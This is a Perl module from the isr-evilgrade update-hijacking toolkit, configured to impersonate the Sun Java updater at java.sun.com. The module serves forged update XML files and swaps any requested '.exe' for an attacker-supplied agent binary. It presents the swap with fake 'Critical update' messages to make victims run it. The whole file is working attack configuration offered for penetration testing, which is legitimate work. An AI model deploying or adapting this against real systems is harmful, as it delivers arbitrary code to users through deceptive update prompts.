###############
# sunjava.pm
#
# Copyright 2007 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobyte.com.ar .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with w3af; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#
# '''
##
package modules::sunjava;

use strict;
use Data::Dump qw(dump);

my $base=
{
    'name' => 'Sun Microsystems Java',
    'version' => '1.0',
    'appver' => '< 1.6.0_03',
    'author' => [ 'Francisco Amato < famato +[AT]+ infobyte.com.ar>' ],
    'description' => qq{},    
    'vh' => 'java.sun.com',
    'request' => [
		    {
		    'req' => '^/update/[.\d]+/map\-[.\d]+.xml', #regex friendly
		    'type' => 'file', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => '',
		    'string' => '',
		    'parse' => '',
		    'file' => './include/sunjava_map.xml'
		    },
		    {
		    'req' => '^/java_update.xml$', #regex friendly
		    'type' => 'file', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => '',		    
		    'string' => '',
		    'parse' => '1',
		    'file' => './include/sunjava_update.xml'
		    },
		    {
		    'req' => '.exe', #regex friendly
		    'type' => 'agent', #file|string|agent|install
		    'bin'    => 1,
		    'method' => '', #any
		    'string' => '',
		    'parse' => '',
		    'file' => ''
		    }
    ],
    #Options		    
    'options' => {  'agent'  => { 'val' => './agent/agent.exe', 
		    		  'desc' => 'Agent to inject'},
		    'arg'    => { 'val' => '', 
			    	  'desc' => 'Arg passed to Agent'},
		    'enable' => { 'val' => 1, 
			    	  'desc' => 'Status'},
                    'name'  => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                                'hidden' => 1,
                        	'dynamic' =>1,},                                                    
		    'title'  => { 'val' => 'Critical update',
			    	  'desc' => 'Title name displayed in the update'},
		    'description' => { 'val' => 'This critical update fix internal vulnerability',
					'desc' => 'Description to be displayed during the update'},
		    'atitle'  => { 'val' => 'Critical vulnerability',
			    	   'desc' => 'Title name to be displayed in the systray item popup'},
		    'adescription' => { 'val' => 'This critical update fix internal vulnerability',
					'desc' => 'Description  to be displayed in the systray item popup'},
		    'website' => { 'val' => 'http://java.com/moreinfolink',
			    	   'desc' => 'Website displayed in the update'}
		 }
};


##########################################################################
# FUNCTION      new
# RECEIVES
# RETURNS
# EXPECTS
# DOES          class's constructor
sub new {
    my $class = shift;
    my $self = { 'Base' => $base, @_ };
    return bless $self, $class;
}
1;
